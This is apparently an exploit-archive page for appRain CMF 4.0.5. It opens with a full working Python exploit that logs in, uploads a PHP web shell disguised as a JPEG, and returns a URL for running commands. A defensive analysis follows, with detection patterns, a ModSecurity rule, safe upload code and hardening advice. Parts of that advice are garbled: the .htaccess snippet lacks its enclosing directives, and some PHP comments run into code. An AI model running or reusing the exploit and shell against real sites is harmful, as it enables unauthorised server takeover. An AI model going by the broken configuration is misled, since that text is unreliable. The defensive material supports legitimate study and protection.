appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)

Exploit Author: Ahmet Ümit BAYRAM Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-06-03 
# Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.apprain.org
# Software Link:
https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip
# Version: latest
# Tested on: MacOS

import requests
import sys
import time
import random
import string

def generate_filename():
""" Generate a 5-character random string for filename. """
return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"

def login(site, username, password):
print("Logging in...")
time.sleep(2)
login_url = f"https://{site}/admin/system"
session = requests.Session()
login_data = {
'data[Admin][admin_id]': username,
'data[Admin][admin_password]': password
}
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
response = session.post(login_url, data=login_data, headers=headers)
if "Logout" in response.text:
print("Login Successful!")
return session
else:
print("Login Failed!")
sys.exit()

def upload_shell(session, site):
print("Shell preparing...")
time.sleep(2)
filename = generate_filename()
upload_url = f"https://{site}/admin/filemanager/upload"
files = {
'data[filemanager][image]': (filename, "<html><body><form method='GET'
name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'
name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'
value='Execute'></form><pre><?php if(isset($_GET['cmd'])){
system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')
}
data = {
'submit': 'Upload'
}
response = session.post(upload_url, files=files, data=data)
if response.status_code == 200 and "uploaded successfully" in response.text:
print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")
else:
print("Exploit Failed!")
sys.exit()

if __name__ == "__main__":
print("Exploiting...")
time.sleep(2)
if len(sys.argv) != 4:
print("Usage: python exploit.py sitename.com username password")
sys.exit()
site = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
session = login(site, username, password)
upload_shell(session, site)


Overview

This article reviews a disclosed authenticated Remote Code Execution (RCE) vulnerability affecting appRain CMF 4.0.5 that stems from unsafe authenticated file uploads. It explains the root cause at a technical level, the likely impact, how defenders can detect exploitation attempts, and robust mitigation and hardening measures — including safe code patterns and web server configuration to prevent arbitrary code execution from uploaded files.

Vulnerability summary

  • Type: Authenticated file upload leading to remote code execution (RCE)
  • Affected component: File manager / upload handler
  • Root cause (high level): Insufficient validation of uploaded files (extension/MIME/content), improper storage and execution policies that allow user-supplied files to be requested and interpreted by the web server as executable code
  • Prerequisites: Valid credentials to an account with access to the file upload feature (authenticity required)

How this class of vulnerability works (technical, non-actionable)

At a high level, the application accepts a file through an authenticated upload interface and places it into a web-accessible directory. If the upload handler fails to discriminate between safe content (images, documents) and executable code (PHP, server-side includes, etc.), an attacker with upload privileges can store a file that the web server will execute when requested by an HTTP GET. Common bypasses include:

  • Uploading a file with a non-standard extension but with PHP code inside it, relying on server configuration that treats some extensions (e.g., .inc) as parsed by PHP.
  • Faking the Content-Type header (e.g., image/jpeg) while the server only checks the header and not the actual file contents or MIME type.
  • Placing files into a directory where the web server executes scripts by default.

The net result is arbitrary command execution on the target host under the web server user, which can lead to full compromise depending on host configuration and privileges.

Impact

  • Remote command execution as the web server user.
  • Persistence via web shells or cronjobs.
  • Data exfiltration, lateral movement, and privilege escalation opportunities.
  • Site defacement, malware hosting, or pivot to internal networks.

Detection: indicators and logging patterns

Detection should focus on identifying suspicious upload requests and follow-up access to uploaded artifacts that contain web shell markers or unusual URL parameters. Below are defensive detection ideas and examples for logging and IDS/WAF rules.

Example web server log patterns to monitor

  • POSTs to upload endpoints: POST /admin/filemanager/upload
  • GETs to uploaded files with query parameters: GET /uploads/filemanager/<random>.inc?cmd=...
  • High-frequency or new filenames that are 4–8 character random names + unusual extensions (e.g., .inc, .phtml)

Example combined Apache access log lines (illustrative):

192.0.2.10 - admin [07/Nov/2025:10:15:22 +0000] "POST /admin/filemanager/upload HTTP/1.1" 200 3421
198.51.100.5 - - [07/Nov/2025:10:15:44 +0000] "GET /uploads/filemanager/abcde.inc?cmd=whoami HTTP/1.1" 200 5123

These patterns alone are not definitive proof, but combined with content inspection (request bodies containing "<?php" or suspicious functions like system/exec/shell_exec), they are high priority for investigation.

Example defensive ModSecurity rule (conceptual)


# Block requests with obvious PHP code in the body (defensive)
SecRule REQUEST_BODY "@rx <\?php" \
  "id:100001,phase:2,deny,log,msg:'Block request body containing PHP opening tag'"

Explanation: This ModSecurity rule shows a defensive policy that blocks requests whose bodies include PHP code (the "<?php" tag). It is intended for deployment in a controlled environment and must be tuned to avoid false positives. Use such rules as part of a layered defense, not as the sole control.

Mitigation and remediation (recommended fixes)

Fixing this class of vulnerability requires a layered approach: validating input, restricting execution, adjusting storage locations, and hardening server configuration and authentication. The following controls are effective when combined.

1) Enforce strict file validation (server-side only)


/* Safe upload handling (PHP) — server-side validation example */$allowed = [
  'image/jpeg' => 'jpg',
  'image/png'  => 'png',
  'image/gif'  => 'gif'
];

if (! isset($_FILES['file'])) {
  http_response_code(400); exit('No file');
}

$tmp = $_FILES['file']['tmp_name'];
if (! is_uploaded_file($tmp)) {
  http_response_code(400); exit('Invalid upload');
}

/* Use finfo to determine actual MIME type */$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime  = $finfo->file($tmp);

if (! array_key_exists($mime, $allowed)) {
  http_response_code(415); exit('Unsupported file type');
}

/* Generate a safe filename and store outside webroot */$ext = $allowed[$mime];
$safeName = bin2hex(random_bytes(12)) . '.' . $ext;
$destination = '/var/www/storage/uploads/' . $safeName;

/* Move the file and set restrictive permissions */if (! move_uploaded_file($tmp, $destination)) {
  http_response_code(500); exit('Upload failed');
}
chmod($destination, 0644);
echo 'Upload accepted';

Explanation: This example demonstrates safe server-side upload handling:

  • Use finfo to detect the file's actual MIME type rather than relying on client headers.
  • Whitelist allowed MIME types and map them to safe extensions.
  • Store uploads outside the webroot (e.g., /var/www/storage/uploads) so they cannot be directly executed by the web server.
  • Generate unpredictable filenames, move the uploaded file using move_uploaded_file, and set permissions to non-executable.

2) Prevent direct execution in upload directories

If you must keep files in a web-accessible location, explicitly disable script execution in that directory with web server configuration.


# Example Apache .htaccess to disable PHP execution in an uploads directory

  Require all denied


# Ensure handlers are not applied

  php_flag engine off

Explanation: This configuration denies requests for common server-side script extensions and disables PHP engine parsing inside the uploads directory, preventing uploaded files with executable content from running.

3) Use Content Security & Access Controls

  • Serve uploaded files through a controlled proxy that enforces authorization and content-type headers (Content-Disposition: attachment when appropriate).
  • Use least privilege for the web server account and separate upload storage with different permissions.
  • Limit upload functionality to the smallest set of trusted roles.

4) Harden authentication and session controls

  • Require strong, unique credentials and implement account lockout on suspicious attempts.
  • Enable Multi-Factor Authentication (MFA) for administrative accounts where possible.
  • Enforce short session lifetimes and rotate session tokens on privilege changes.

5) Logging, monitoring, and incident response

  • Log file upload events, including username, source IP, filename, timestamp, and result (accepted/rejected).
  • Monitor access to new or changed files in upload directories and alert on GET requests with query parameters to newly created files.
  • Perform periodic file integrity and content scans (e.g., scanning for "<?php" strings or suspicious function calls) to detect planted web shells.

Patch and vendor guidance

If you operate appRain CMF instances, check the vendor's advisories and update to a non-vulnerable release when it is available. If a vendor patch is not yet published, apply the mitigations above as temporary compensating controls (disable execution in uploads directory, move storage outside webroot, tighten validation).

Example response plan for detected exploitation

  • Immediately revoke the credentials used for the upload and rotate affected credentials.
  • Contain by removing or isolating the uploaded file and blocking the URL via web server or WAF rules.
  • Collect logs (application, web server, system) for forensic analysis.
  • Scan the host for additional indicators of compromise (reverse shells, cron jobs, new users).
  • Rebuild compromised hosts if integrity cannot be assured.

Responsible disclosure and coordination

If you discover this vulnerability in your environment or in third-party deployments, notify the site owner and vendor through established responsible disclosure channels. Provide sufficient details for remediation but avoid publishing exploit steps that would enable mass exploitation. Coordinate with legal and incident response teams before public disclosure.

Conclusion — defense in depth

Authenticated RCE through file uploads is a critical risk but entirely preventable with a layered defense: strict server-side validation and whitelisting, secure storage and permissions, server configuration that disables execution in upload areas, and strong access controls. Combine these with logging, monitoring, and rapid incident response to reduce likelihood and impact.